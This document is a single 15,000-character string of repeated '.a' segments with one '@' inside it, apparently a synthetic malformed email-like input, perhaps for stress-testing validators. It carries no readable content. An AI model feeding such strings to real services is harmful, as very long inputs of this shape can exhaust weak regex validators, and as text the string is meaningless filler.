.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a@a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a